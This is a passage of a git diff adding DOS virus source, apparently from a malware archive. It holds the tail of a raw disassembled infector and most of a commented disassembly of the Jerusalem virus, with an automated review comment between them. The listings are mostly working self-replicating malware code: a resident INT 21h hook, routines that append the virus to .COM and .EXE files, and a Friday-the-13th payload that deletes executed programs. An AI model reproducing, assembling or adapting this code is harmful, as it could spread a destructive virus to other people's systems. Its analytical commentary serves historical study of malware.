+ ; set intrpt vector al to ds:dx
+loc_7:
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+ pop es
+ pop ds
+ pushf ; Push flags
+ call dword ptr cs:data_25e
+ push ds
+ pop es
+ mov ah,49h ; 'I'
+ int 21h ; DOS Services ah=function 49h
+ ; release memory block, es=seg
+ mov ah,4Dh ; 'M'
+ int 21h ; DOS Services ah=function 4Dh
+ ; get return code info in ax
+ mov ah,31h ; '1'
+ mov dx,600h
+ mov cl,4
+ shr dx,cl ; Shift w/zeros fill
+ add dx,10h
+ int 21h ; DOS Services ah=function 31h
+ ; terminate & stay resident
+ db 32h, 0C0h, 0CFh, 2Eh, 83h, 3Eh
+ db 1Fh, 0, 2, 75h, 17h, 50h
+ db 53h, 51h, 52h, 55h, 0B8h, 2
+ db 6, 0B7h, 87h, 0B9h, 5, 5
+ db 0BAh, 10h, 10h, 0CDh, 10h, 5Dh
+ db 5Ah, 59h, 5Bh, 58h, 2Eh, 0FFh
+ db 0Eh, 1Fh, 0, 75h, 12h, 2Eh
+ db 0C7h, 6, 1Fh, 0, 1, 0
+ db 50h, 51h, 56h, 0B9h, 1, 40h
+ db 0F3h, 0ACh
+ db 5Eh, 59h, 58h
+loc_8:
+ jmp dword ptr cs:data_23e
+ db 9Ch,
80h, 0FCh, 0E0h, 75h, 5
+ db 0B8h, 0, 3, 9Dh, 0CFh, 80h
+ db 0FCh, 0DDh, 74h, 13h, 80h, 0FCh
+ db 0DEh, 74h, 28h, 3Dh, 0, 4Bh
+ db 75h, 3, 0E9h, 0B4h, 0
+loc_9:
+ popf ; Pop flags
+ jmp dword ptr cs:data_25e
+loc_10:
+ pop ax
+ pop ax
+ mov ax,100h
+ mov cs:data_18e,ax
+ pop ax
+ mov cs:data_19e,ax
+ rep movsb ; Rep when cx >0 Mov [si] to es:[di]
+ popf ; Pop flags
+ mov ax,cs:data_21e
+ jmp dword ptr cs:data_18e
+loc_11:
+ add sp,6
+ popf ; Pop flags
+ mov ax,cs
+ mov ss,ax
+ mov sp,710h
+ push es
+ push es
+ xor di,di ; Zero register
+ push cs
+ pop es
+ mov cx,10h
+ mov si,bx
+ mov di,21h
+ rep movsb ; Rep when cx >0 Mov [si] to es:[di]
+ mov ax,ds
+ mov es,ax
+ mul word ptr cs:data_41e ; ax = data * ax
+ add ax,cs:data_31e
+ adc dx,0
+ div word ptr cs:data_41e ; ax,dxrem=dx:ax/data
+ mov ds,ax
+ mov si,dx
+ mov di,dx
+ mov bp,es
+ mov bx,cs:data_33e
+ or bx,bx ; Zero ?
+ jz loc_13 ; Jump if zero
+loc_12:
+ mov cx,8000h
+ rep movsw ; Rep when cx >0 Mov [si] to es:[di]
+ add ax,1000h
+ add bp,1000h
+ mov ds,ax
+ mov es,bp
+ dec bx
+ jnz loc_12 ; Jump if not zero
+loc_13:
+ mov cx,cs:data_32e
+ rep movsb ; Rep when cx >0 Mov [si] to es:[di]
+ pop ax
+ push ax
+ add ax,10h
+ add cs:data_30e,ax
+data_47 db 2Eh
+ db 1, 6, 25h, 0, 2Eh, 0A1h
+ db 21h, 0, 1Fh, 7, 2Eh, 8Eh
+ db 16h, 29h, 0, 2Eh, 8Bh, 26h
+ db 27h, 0, 2Eh, 0FFh, 2Eh, 23h
+ db 0
+loc_14:
+ xor cx,cx ; Zero register
+ mov ax,4301h
+ int 21h ; DOS Services ah=function 43h
+ ; get/set file attrb, nam@ds:dx
+ mov ah,41h ; 'A'
+ int 21h ; DOS Services ah=function 41h
+ ; delete file, name @ ds:dx
+ mov ax,4B00h
+ popf ; Pop flags
+ jmp dword ptr cs:data_25e
+loc_15:
+ cmp byte ptr cs:data_20e,1
+ je loc_14 ; Jump if equal
+ mov word ptr cs:data_37e,0FFFFh
+ mov word ptr cs:data_44e,0
+ mov cs:data_42e,dx
+ mov cs:data_43e,ds
+ push ax
+ push bx
+ push cx
+ push dx
+ push si
+ push di
+ push ds
+ push es
+ cld ; Clear direction
+ mov di,dx
+ xor dl,dl ; Zero register
+ cmp byte ptr [di+1],3Ah ; ':'
+ jne loc_16
; Jump if not equal
+ mov dl,[di]
+ and dl,1Fh
+loc_16:
+ mov ah,36h ; '6'
+ int 21h ; DOS Services ah=function 36h
+ ; get free space, drive dl,1=a:
+ cmp ax,0FFFFh
+ jne loc_18 ; Jump if not equal
+loc_17:
+ jmp loc_44 ; (06E7)
+loc_18:
+ mul bx ; dx:ax = reg * ax
+ mul cx ; dx:ax = reg * ax
+ or dx,dx ; Zero ?
+ jnz loc_19 ; Jump if not zero
+ cmp ax,710h
+ jb loc_17 ; Jump if below
+loc_19:
+ mov dx,cs:data_42e
+ push ds
+ pop es
+ xor al,al ; Zero register
+ mov cx,41h
+ repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
+ mov si,cs:data_42e
+loc_20:
+ mov al,[si]
+ or al,al ; Zero ?
+ jz loc_22 ; Jump if zero
+ cmp al,61h ; 'a'
+ jb loc_21 ; Jump if below
+ cmp al,7Ah ; 'z'
+ ja loc_21 ; Jump if above
+ sub byte ptr [si],20h ; ' '
+loc_21:
+ inc si
+ jmp short loc_20 ; (0490)
+loc_22:
+ mov cx,0Bh
+ sub si,cx
+ mov di,84h
+ push cs
+ pop es
+ mov cx,0Bh
+ repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
+ jnz loc_23 ; Jump if not zero
+ jmp loc_44 ; (06E7)
+loc_23:
+ mov ax,4300h
+ int 21h ; DOS Services ah=function 43h
+ ; get/set file attrb, nam@ds:dx
+ jc loc_24 ; Jump if carry Set
+ mov cs:data_38e,cx
+loc_24:
+ jc loc_26 ; Jump if carry Set
+ xor al,al ; Zero register
+ mov cs:data_36e,al
+ push ds
+ pop es
+ mov di,dx
+ mov cx,41h
+ repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
+ cmp byte ptr [di-2],4Dh ; 'M'
+ je loc_25 ; Jump if equal
+ cmp byte ptr [di-2],6Dh ; 'm'
+ je loc_25 ; Jump if equal
+ inc byte ptr cs:data_36e
+loc_25:
+ mov ax,3D00h
+ int 21h ; DOS Services ah=function 3Dh
+ ; open file, al=mode,name@ds:dx
+loc_26:
+ jc loc_28 ; Jump if carry Set
+ mov cs:data_37e,ax
+ mov bx,ax
+ mov ax,4202h
+ mov cx,0FFFFh
+ mov dx,0FFFBh
+ int 21h ; DOS Services ah=function 42h
+ ; move file ptr, cx,dx=offset
+ jc loc_26 ; Jump if carry Set
+ add ax,5
+ mov cs:data_22e,ax
+ mov cx,5
+ mov dx,6Bh
+ mov ax,cs
+ mov ds,ax
+ mov es,ax
+ mov ah,3Fh ; '?'
+ int 21h ; DOS Services ah=function 3Fh
+ ; read file, cx=bytes, to ds:dx
+ mov di,dx
+ mov si,5
+ repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
+ jnz loc_27 ; Jump if not zero
+ mov ah,3Eh ; '>'
+ int 21h ; DOS Services ah=function 3Eh
+ ; close file, bx=file handle
+ jmp loc_44 ; (06E7)
+loc_27:
+ mov ax,3524h
+ int 21h ; DOS Services ah=function 35h
+ ; get intrpt vector al in es:bx
+ mov ds:data_27e,bx
+ mov ds:data_28e,es
+ mov dx,21Bh
+ mov ax,2524h
+ int 21h ; DOS Services ah=function 25h
+ ; set intrpt vector al to ds:dx
+ lds dx,dword ptr ds:data_42e ; Load 32 bit ptr
+ xor cx,cx ; Zero register
+ mov ax,4301h
+ int 21h ; DOS Services ah=function 43h
+ ; get/set file attrb, nam@ds:dx
+loc_28:
+ jc loc_29 ; Jump if carry Set
+ mov bx,cs:data_37e
+ mov ah,3Eh ; '>'
+ int 21h ; DOS Services ah=function 3Eh
+ ; close file, bx=file handle
+ mov word ptr cs:data_37e,0FFFFh
+ mov ax,3D02h
+ int 21h ; DOS Services ah=function 3Dh
+ ; open file, al=mode,name@ds:dx
+ jc loc_29 ; Jump if carry Set
+ mov cs:data_37e,ax
+ mov ax,cs
+ mov ds,ax
+ mov es,ax
+ mov bx,ds:data_37e
+ mov ax,5700h
+ int 21h ; DOS Services ah=function 57h
+ ; get/set file date & time
+ mov ds:data_39e,dx
+ mov ds:data_40e,cx
+ mov ax,4200h
+ xor cx,cx ; Zero register
+ mov dx,cx
+ int 21h ; DOS Services ah=function 42h
+ ; move file ptr, cx,dx=offset
+loc_29:
+ jc loc_32 ; Jump if carry Set
+ cmp byte ptr ds:data_36e,0
+ je loc_30 ; Jump if equal
+ jmp short loc_34 ; (05E6)
+ db 90h
+loc_30:
+ mov bx,1000h
+ mov ah,48h ; 'H'
+ int 21h ; DOS Services ah=function 48h
+ ; allocate memory, bx=bytes/16
+ jnc loc_31 ; Jump if carry=0
+ mov ah,3Eh ; '>'
+ mov bx,ds:data_37e
+ int 21h ; DOS Services ah=function 3Eh
+ ; close file, bx=file handle
+ jmp loc_44 ; (06E7)
+loc_31:
+ inc word ptr ds:data_44e
+ mov es,ax
+ xor si,si ; Zero register
+ mov di,si
+ mov cx,710h
+ rep movsb ; Rep when cx >0 Mov [si] to es:[di]
+ mov dx,di
+ mov cx,ds:data_22e
+ mov bx,ds:data_37e
+ push es
+ pop ds
+ mov
ah,3Fh ; '?'
+ int 21h ; DOS Services ah=function 3Fh
+ ; read file, cx=bytes, to ds:dx
+loc_32:
+ jc loc_33 ; Jump if carry Set
+ add di,cx
+ xor cx,cx ; Zero register
+ mov dx,cx
+ mov ax,4200h
+ int 21h ; DOS Services ah=function 42h
+ ; move file ptr, cx,dx=offset
+ mov si,5
+ mov cx,5
+ rep movs byte ptr es:[di],cs:[si] ; Rep when cx >0 Mov [si] to es:[di]
+ mov cx,di
+ xor dx,dx ; Zero register
+ mov ah,40h ; '@'
+ int 21h ; DOS Services ah=function 40h
+ ; write file cx=bytes, to ds:dx
+loc_33:
+ jc loc_35 ; Jump if carry Set
+ jmp loc_42 ; (06A2)
+loc_34:
+ mov cx,1Ch
+ mov dx,4Fh
+ mov ah,3Fh ; '?'
+ int 21h ; DOS Services ah=function 3Fh
+ ; read file, cx=bytes, to ds:dx
+loc_35:
+ jc loc_37 ; Jump if carry Set
+ mov word ptr ds:data_11e,1984h
+ mov ax,ds:data_9e
+ mov ds:data_3e,ax
+ mov ax,ds:data_10e
+ mov ds:data_2e,ax
+ mov ax,ds:data_12e
+ mov ds:data_4e,ax
+ mov ax,ds:data_13e
+ mov ds:data_5e,ax
+ mov ax,ds:data_7e
+ cmp word ptr ds:data_6e,0
+ je loc_36 ; Jump if equal
+ dec ax
+loc_36:
+ mul word ptr ds:data_14e ; ax = data * ax
+ add ax,ds:data_6e
+ adc dx,0
+ add ax,0Fh
+ adc dx,0
+ and ax,0FFF0h
+ mov ds:data_16e,ax
+ mov ds:data_17e,dx
+ add ax,710h
+ adc dx,0
+loc_37:
+ jc loc_39 ; Jump if carry Set
+ div word ptr ds:data_14e ; ax,dxrem=dx:ax/data
+ or dx,dx ; Zero ?
+ jz loc_38 ; Jump if zero
+ inc ax
+loc_38:
+ mov ds:data_7e,ax
+ mov ds:data_6e,dx
+ mov ax,ds:data_16e
+ mov dx,ds:data_17e
+ div word ptr ds:data_15e ; ax,dxrem=dx:ax/data
+ sub ax,ds:data_8e
+ mov ds:data_13e,ax
+ mov word ptr ds:data_12e,0C5h
+ mov ds:data_9e,ax
+ mov word ptr ds:data_10e,710h
+ xor cx,cx ; Zero register
+ mov dx,cx
+ mov ax,4200h
+ int 21h ; DOS Services ah=function 42h
+ ; move file ptr, cx,dx=offset
+loc_39:
+ jc loc_40 ; Jump if carry Set
+ mov cx,1Ch
+ mov dx,4Fh
+ mov ah,40h ; '@'
+ int 21h ; DOS Services ah=function 40h
+ ; write file cx=bytes, to ds:dx
+loc_40:
+ jc loc_41 ; Jump if carry Set
+ cmp ax,cx
+ jne loc_42 ; Jump if not equal
+ mov dx,ds:data_16e
+ mov cx,ds:data_17e
+ mov ax,4200h
+ int 21h ; DOS Services ah=function 42h
+ ; move file ptr, cx,dx=offset
+loc_41:
+ jc loc_42 ; Jump if carry Set
+ xor dx,dx ; Zero register
+ mov cx,710h
+ mov ah,40h ; '@'
+ int 21h ; DOS Services ah=function 40h
+ ; write file cx=bytes, to ds:dx
+loc_42:
+ cmp word ptr cs:data_44e,0
+ je loc_43 ; Jump if equal
+ mov ah,49h ; 'I'
+ int 21h ; DOS Services ah=function 49h
+ ; release memory block, es=seg
+loc_43:
+ cmp word ptr cs:data_37e,0FFFFh
+ je loc_44 ; Jump if equal
+ mov bx,cs:data_37e
+ mov dx,cs:data_39e
+ mov cx,cs:data_40e
+ mov ax,5701h
+ int 21h ; DOS Services ah=function 57h
+ ; get/set file date & time
+ mov ah,3Eh ; '>'
+ int 21h ; DOS Services ah=function 3Eh
+ ; close file, bx=file handle
+ lds dx,dword ptr cs:data_42e ; Load 32 bit ptr
+ mov cx,cs:data_38e
+ mov ax,4301h
+ int 21h ; DOS Services ah=function 43h
+ ; get/set file attrb, nam@ds:dx
+ lds dx,dword ptr cs:data_27e ; Load 32 bit ptr
+ mov ax,2524h
+ int 21h ; DOS Services ah=function 25h
+ ; set intrpt vector al to ds:dx
+loc_44:
+ pop es
+ pop ds
+ pop di
+ pop si
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+ popf ; Pop flags
+ jmp dword ptr cs:data_25e
+ db 11 dup (0)
+ db 4Dh, 63h, 21h, 4
+ db 13 dup (0)
+ db 5Bh, 0, 0, 0, 2Bh, 0
+ db 0FFh
+ db 17 dup (0FFh)
+ db
'E:\SV\EXECDOS.BAT'
+ db 0
+ db 'EXECDOS', 0Dh
+ db 0, 7Dh, 0, 0, 80h, 0
+ db 53h, 0Eh, 5Ch, 0, 53h, 0Eh
+ db 6Ch, 4Dh, 63h, 21h, 0, 10h
+ db 'EC=F:\DOS\C'
+ db 0E9h, 92h, 0, 73h, 55h, 4Dh
+ db 73h, 44h, 6Fh, 73h, 0, 1
+ db 0B8h, 22h, 0, 0, 0, 1Ah
+ db 3, 2Ch, 2, 70h, 0
+loc_45:
+ xchg ax,dx
+ push cs
+ sub [bp+si],bx
+;* jmp short loc_46 ;*(0781)
+ db 0EBh, 4
+ db 63h, 21h, 0D0h, 59h
+int_21h_entry endp
+
+
+seg_a ends
+
+
+
+ end start
diff --git a/MSDOS/Virus.MSDOS.Unknown.jerusale.asm b/MSDOS/Virus.MSDOS.Unknown.jerusale.asm
new file mode 100644
index 00000000..da7d7a43
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.jerusale.asm
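Review bot: The `data_1e` … `data_44e` equates at the top of this hunk are bare offsets with no role comments, so a reader has to recover each field's meaning from its uses further down — `data_20e`, for instance, is the byte cleared before the `mov ah,2Ah` date call, incremented after the `cmp dl,0Dh` Friday-the-13th test and checked at `loc_15`, and `data_25e`/`data_26e` hold the INT 21h vector saved after `mov ax,3521h`. The commented sibling listing added in this same commit, MSDOS/Virus.MSDOS.Unknown.jerusale.asm, names the same offsets (`TIME_BOMB` at 0Eh, `OLD_21` at 17h, `HANDLE` at 70h), so a one-line comment per equ cross-referencing those names, e.g. `data_20e equ 0Eh ; TIME_BOMB in jerusale.asm, tested at loc_15`, would let analysts read the two listings side by side. The `;* jmp far ptr loc_1 ;*(0000:03FC)` line in `int_24h_entry` and the `db 0EAh, 0FCh, 3, 0, 0` run that follows it suggest these `db` sequences are instruction bytes the disassembler could not resolve rather than data; a sentence in the file header saying so would stop a reader treating them as constants.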
@@ -0,0 +1,790 @@
+CODE SEGMENT
+;The following is a disassembled, structured and commented listing of the
+;Jerusalem .COM and .EXE infector virus. All comments, structure inclusions
+;
+; INTERPATH
+; 4423 Cheeney Street
+; Santa Clara, CA 95054
+
+;-----------------------------------------------------------------------;
+; THE "JERUSALEM" VIRUS ;
+;-----------------------------------------------------------------------;
+ ;
+ ORG 100H ;
+ ;
+;-----------------------------------------------------------------------;
+; JERUSALEM VIRUS ;
+;-----------------------------------------------------------------------;
+BEGIN_COM: ; COM FILES START HERE
+ JMP CONTINUE ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+A0103 DB 073H,055H
+
+MS_DOS DB 'MsDos' ;
+
+ DB 000H,001H,015H,018H
+
+TIME_BOMB DB 0 ;WHEN == 1 THIS FILE GETS DELETED!
+
+ DB 000H
+A0010 DB 000H
+
+A0011 DW 100H ;HOST SIZE (BEFORE INFECTION)
+
+OLD_08 DW 0FEA5H,0F000H ;OLD INT 08H VECTOR (CLOCK TIC)
+
+OLD_21 DW 1460H,024EH ;OLD INT 21H VECTOR
+OLD_24 DW 0556H,16A5H ;001B
+
+A_FLAG DW 7E48H ;???
+
+A0021 DB 000H,000H,000H,000H,000H,000H,000H
+ DB 000H,000H,000H,000H
+
+A002C DW 0 ;A SEGMENT
+
+ DB 000H,000H
+A0030 DB 000H
+
+A0031 DW 0178EH ;OLD ES VALUE
+
+A0033 DW 0080H ;
+ ;
+EXEC_BLOCK DW 0 ;ENV. SEG. ADDRESS ;0035
+ DW 80H ;COMMAND LINE ADDRESS
+ DW 178EH ;+4
+ DW 005CH ;FCB #1 ADDRESS
+ DW 178EH ;+8
+ DW 006CH ;FCB #2 ADDRESS
+ DW 0178EH ;+12
+ ;
+HOST_SP DW 0710H ;(TAKEN FROM EXE HEADER) 0043
+HOST_SS DW 347AH ;(AT TIME OF INFECTION)
+HOST_IP DW 00C5H ;
+HOST_CS DW 347AH ;
+;CHECKSUM NOT STORED, TO UNINFECT, YOU MUST CALC IT YOURSELF
+ ;
+A004B DW 0F010H ;
+A004D DB 82H ;
+A004E DB 0 ;
+
+EXE_HDR DB 1CH DUP (?) ;004F
+
+A006B DB 5 DUP (?)
;LAST 5 BYTES OF HOST
+
+HANDLE DW 0005H ;0070
+HOST_ATT DW 0020H ;0072
+HOST_DATE DW 0021H ;0074
+HOST_TIME DW 002DH ;0076
+
+BLOCK_SIZE DW 512 ;512 BYTES/BLOCK
+
+A007A DW 0010H
+
+HOST_SIZE DW 27C0H,0001H ;007C
+HOST_NAME DW 41D9H,9B28H ;POINTER TO HOST NAME
+
+COMMAND_COM DB 'COMMAND.COM'
+
+ DB 1
+A0090 DB 0,0,0,0,0
+
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+CONTINUE: ;
+ CLD ;
+ MOV AH,0E0H ;DO A ???...
+ INT 21H ;
+ ;
+ CMP AH,0E0H ;
+ JNC L01B5 ;
+ CMP AH,3 ;
+ JC L01B5 ;
+ ;
+ MOV AH,0DDH ;
+ MOV DI,offset BEGIN_COM ;DI = BEGINNING OF OUR (VIRUS) CODE
+ MOV SI,0710H ;SI = SIZE OF OUR (VIRUS) CODE
+ ADD SI,DI ;SI = BEGINNING OF HOST CODE
+ MOV CX,CS:[DI+11H] ;CX = (SIZE OF HOST CODE?)
+ INT 21H ;
+ ;
+L01B5: MOV AX,CS ;TWEEK CODE SEGMENT BY 100H
+ ADD AX,10H ;
+ MOV SS,AX ;SS = TWEEKed CS
+ MOV SP,700H ;SP = END OF OUR CODE (VIRUS)
+ ;
+;TWEEK CS TO MAKE IT LOOK LIKE IP STARTS AT 0, NOT 100H BY DOING A RETF
+ ;
+ PUSH AX ;JMP FAR CS+10H:IP-100H
+ MOV AX,offset BEGIN_EXE - offset BEGIN_COM
+ PUSH AX ;
+ RETF ;
+ ;
+;---------------------------------------;
+ ORG 0C5h ;
+;---------------------------------------;
+ ;
+BEGIN_EXE: ;EXE FILES START HERE
+ CLD ;
+ PUSH ES ;
+ ;
+ MOV CS:[A0031],ES ;
+ MOV CS:[EXEC_BLOCK+4],ES ;INIT EXEC_BLOCK SEG VALUES
+ MOV CS:[EXEC_BLOCK+8],ES ;
+ MOV CS:[EXEC_BLOCK+12],ES ;
+ ;
+ MOV AX,ES ;TWEEK ES SAME AS CS ABOVE
+ ADD AX,10H ;
+ ADD CS:[HOST_CS],AX ; SAVE NEW ES VALUE
+ ADD CS:[HOST_SS],AX ;
+ ;
+ MOV AH,0E0H ;
+ INT 21H ;
+ ;
+ CMP AH,0E0H ;
+ JNC L0106 ;00F1 7313
+ ;
+ CMP AH,3 ;
+ POP ES ;00F6
+ MOV SS,CS:[HOST_SS] ;
+ MOV SP,CS:[HOST_SP] ;
+ JMP far CS:[HSOT_IP] ;
+ ;
+L0106: XOR AX,AX ;0106 33C0
+ MOV ES,AX ;0108 8EC0
+ MOV AX,ES:[03FC] ;010A 26A1FC03
+ MOV CS:[A004B],AX ;010E 2EA34B00
+ MOV AL,ES:[03FE] ;0112 26A0FE03
+ MOV CS:[A004D],AL ;0116 2EA24D00
+ MOV Word ptr ES:[03FC],A5F3 ;011A 26C706FC03F3A5
+
MOV Byte ptr ES:[03FE],CB ;0121 26C606FE03CB
+ POP AX ;0127 58
+ ADD AX,10H ;0128 051000
+ MOV ES,AX ;012B 8EC0
+ PUSH CS ;012D 0E
+ POP DS ;012E 1F
+ MOV CX,710H ;SIZE OF VIRUS CODE
+ SHR CX,1 ;0132 D1E9
+ XOR SI,SI ;0134 33F6
+ MOV DI,SI ;0136 8BFE
+ PUSH ES ;0138 06
+ MOV AX,0142 ;0139 B84201
+ PUSH AX ;013C 50
+ JMP 0000:03FC ;013D EAFC030000
+ ;
+ MOV AX,CS ;0142 8CC8
+ MOV SS,AX ;0144 8ED0
+ MOV SP,700H ;0146 BC0007
+ XOR AX,AX ;0149 33C0
+ MOV DS,AX ;014B 8ED8
+ MOV AX,CS:[A004B] ;014D 2EA14B00
+ MOV [03FC],AX ;0151 A3FC03
+ MOV AL,CS:[A004D] ;0154 2EA04D00
+ MOV [03FE],AL ;0158 A2FE03
+ MOV BX,SP ;015B 8BDC
+ MOV CL,04 ;015D B104
+ SHR BX,CL ;015F D3EB
+ ADD BX,+10 ;0161 83C310
+ MOV CS:[A0033],BX ;
+ ;
+ MOV AH,4AH ;
+ MOV ES,CS:[A0031] ;
+ INT 21H ;MODIFY ALLOCATED MEMORY BLOCKS
+ ;
+ MOV AX,3521 ;
+ INT 21H ;GET VECTOR
+ MOV CS:[OLD_21],BX ;
+ MOV CS:[OLD_21+2],ES ;
+ ;
+ PUSH CS ;0181 0E
+ POP DS ;0182 1F
+ MOV DX,offset NEW_INT_21 ;0183 BA5B02
+ MOV AX,2521 ;
+ INT 21H ;SAVE VECTOR
+ ;
+ MOV ES,[A0031] ;018B 8E063100
+ MOV ES,ES:[A002C] ;018F 268E062C00
+ XOR DI,DI ;0194 33FF
+ MOV CX,7FFFH ;0196 B9FF7F
+ XOR AL,AL ;0199 32C0
+ REPNE SCASB ;019C AE
+ CMP ES:[DI],AL ;019D 263805
+ LOOPNZ 019B ;01A0 E0F9
+ MOV DX,DI ;01A2 8BD7
+ ADD DX,+03 ;01A4 83C203
+ MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM
+ PUSH ES ;
+ POP DS ;
+ PUSH CS ;
+ POP ES ;
+ MOV BX,35H ;
+ ;
+ PUSH DS ;01B1 ;
+ PUSH ES ;
+ PUSH AX ;
+ PUSH BX ;
+ PUSH CX ;
+ PUSH DX ;
+ ;
+ MOV AH,2AH ;
+ INT 21H ;GET DATE
+ ;
+ MOV Byte ptr CS:[TIME_BOMB],0 ;SET "DONT DIE"
+ ;
+ CMP CX,1987 ;IF 1987...
+ JE L01F7 ;...JUMP
+ CMP AL,5 ;IF NOT FRIDAY...
+ JNE L01D8 ;...JUMP
+ CMP DL,0DH ;IF DATE IS NOT THE 13th...
+ JNE L01D8 ;...JUMP
+ INC Byte ptr CS:[TIME_BOMB] ;TIC THE BOMB COUNT
+ JMP L01F7 ;
+ ;
+L01D8: MOV AX,3508H ;GET CLOCK TIMER VECTOR
+ INT 21H ;GET VECTOR
+ MOV CS:[OLD_08],BX ;
+ MOV CS:[OLD_08],ES ;
+ ;
+ PUSH CS ;DS=CS
+ POP DS ;
+ ;
+ MOV Word ptr [A_FLAG],7E90H ;
+ ;
+ MOV AX,2508H ;SET NEW CLOCK TIC HANDLER
+ MOV DX,offset NEW_08 ;
+ INT 21H ;SET VECTOR
+ ;
+L01F7: POP DX ;
+ POP CX ;
+ POP BX ;
+ POP AX ;
+ POP ES ;
+ POP DS ;
+ PUSHF ;
+ CALL far CS:[OLD_21] ;
+ PUSH DS ;
+ POP ES ;
+ ;
+ MOV AH,49H ;
+ INT 21H ;FREE ALLOCATED MEMORY
+ ;
+ MOV AH,4DH ;
+ INT 21H ;GET RETURN CODE OF A SUBPROCESS
+ ;
+;---------------------------------------;
+; THIS IS WHERE WE REMAIN RESIDENT ;
+;---------------------------------------;
+ MOV AH,31H ;
+ MOV DX,0600H ;020F ;
+ MOV CL,04 ;
+ SHR DX,CL ;
+ ADD DX,10H ;
+ INT 21H ;TERMINATE AND REMAIN RESIDENT
+ ;
+;---------------------------------------;
+NEW_24: XOR AL,AL ;021B ;CRITICAL ERROR HANDLER
+ IRET ;
+ ;
+;-----------------------------------------------------------------------;
+; NEW INTERRUPT 08 (CLOCK TIC) HANDLER ;
+;-----------------------------------------------------------------------;
+NEW_08: CMP Word ptr CS:[A_FLAG],2 ;021E
+ JNE N08_10 ;IF ... JUMP
+ ;
+ PUSH AX ;
+ PUSH BX ;
+ PUSH CX ;
+ PUSH DX ;
+ PUSH BP ;
+ MOV AX,0602H ;SCROLL UP TWO LINES
+ MOV BH,87H ;INVERSE VIDEO ATTRIBUTE
+ MOV CX,0505H ;UPPER LEFT CORNER
+ MOV DX,1010H ;LOWER RIGHT CORNER
+ INT 10H ;
+ POP BP ;
+ POP DX ;
+ POP CX ;
+ POP BX ;
+ POP AX ;
+ ;
+N08_10: DEC Word ptr CS:[A_FLAG] ;ASSURE THAT THIS ONLY HAPPENS ONCE
+ JNZ N08_90 ; BY RESETTING TO 1 IF EQUAL TO ZERO
+ MOV Word ptr CS:[A_FLAG],1 ;
+ ;
+ PUSH AX ;????? IS THIS SOME KIND OF DELAY ?????
+ PUSH CX ;*** COMMENTS SOLICITED **** + PUSH SI ; + MOV CX,4001H ; + REP LODSB ; + POP SI ; + POP CX ; + POP AX ; + ; +N08_90: JMP far CS:[OLD_08] ;PASS CONTROL TO OLD INT 08 VECTOR + ; +;-----------------------------------------------------------------------; +; NEW INTERRUPT 21 HANDLER ; +;-----------------------------------------------------------------------; +NEW_21: PUSHF ;025B ; + CMP AH,0E0H ;IF A E0 REQUEST... + JNE N21_10 ; + MOV AX,300H ;...RETURN AX = 300H + POPF ; (OUR PUSHF) + IRET ; + ; +N21_10: CMP AH,0DDH ;0266 ; + JE N21_30 ;IF DDH...JUMP TO _30 + CMP AH,0DEH ; + JE N21_40 ;IF DEH...JUMP TO _40 + CMP AX,4B00H ;IF SPAWN A PROG... + JNE N21_20 ; + JMP N21_50 ;...JUMP TO _50 + ; +N21_20: POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ;ANY OTHER INT 21 GOES TO OLD VECTOR + ; +N21_30: POP AX ;REMOVE OUR (PUSHF) + POP AX ;? + MOV AX,100H ; + MOV CS:[000A],AX ; + POP AX ; + MOV CS:[000C],AX ; + REP MOVSB ; + POPF ; (OUR PUSHF) + MOV AX,CS:[000F] ; + JMP far CS:[000A] ; + ; +N21_40: ADD SP,+06 ;0298 ; + POPF ; (OUR PUSHF) + MOV AX,CS ; + MOV SS,AX ; + MOV SP,710H ;SIZE OF VIRUS CODE + PUSH ES ; + PUSH ES ;02A4 06 + XOR DI,DI ;02A5 33FF + PUSH CS ;02A7 0E + POP ES ;02A8 07 + MOV CX,0010 ;02A9 B91000 + MOV SI,BX ;02AC 8BF3 + MOV DI,0021 ;02AE BF2100 + REP MOVSB ;02B2 A4 + MOV AX,DS ;02B3 8CD8 + MOV ES,AX ;02B5 8EC0 + MUL Word ptr CS:[A007A] ;02B7 2EF7267A00 + ADD AX,CS:[002B] ;02BC 2E03062B00 + ADC DX,+00 ;02C1 83D200 + DIV Word ptr CS:[A007A] ;02C4 2EF7367A00 + MOV DS,AX ;02C9 8ED8 + MOV SI,DX ;02CB 8BF2 + MOV DI,DX ;02CD 8BFA + MOV BP,ES ;02CF 8CC5 + MOV BX,CS:[002F] ;02D1 2E8B1E2F00 + OR BX,BX ;02D6 0BDB + JE 02ED ;02D8 7413 + MOV CX,8000 ;02DA B90080 + REP MOVSW ;02DE A5 + ADD AX,1000 ;02DF 050010 + ADD BP,1000 ;02E2 81C50010 + MOV DS,AX ;02E6 8ED8 + MOV ES,BP ;02E8 8EC5 + DEC BX ;02EA 4B + JNE 02DA ;02EB 75ED + MOV CX,CS:[002D] ;02ED 2E8B0E2D00 + REP MOVSB ;02F3 A4 + POP AX ;02F4 58 + PUSH AX ;02F5 50 + ADD AX,0010 ;02F6 051000 + ADD CS:[0029],AX ;02F9 
2E01062900 + ADD CS:[0025],AX ;02FE 2E01062500 + MOV AX,CS:[0021] ;0303 2EA12100 + POP DS ;0307 1F + POP ES ;0308 07 + MOV SS,CS:[0029] ;0309 2E8E162900 + MOV SP,CS:[0027] ;030E 2E8B262700 + JMP far CS:[0023] ;0313 2EFF2E2300 + ; +;---------------------------------------; +; IT IS TIME FOR THIS FILE TO DIE... ; +; THIS IS WHERE IT GETS DELETED ! ; +;---------------------------------------; +N21_5A: XOR CX,CX ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE (ATT=0) + ; + MOV AH,41H ; + INT 21H ;DELETE A FILE + ; + MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM + POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ; + ; +;---------------------------------------; +; START INFECTION ; +;---------------------------------------; +N21_50: CMP Byte ptr CS:[TIME_BOMB],1 ;032C ;IF TIME TO DIE... + JE N21_5A ;...JUMP + ; + MOV Word ptr CS:[HANDLE],-1 ;ASSUME NOT OPEN + MOV Word ptr CS:[A008F],0 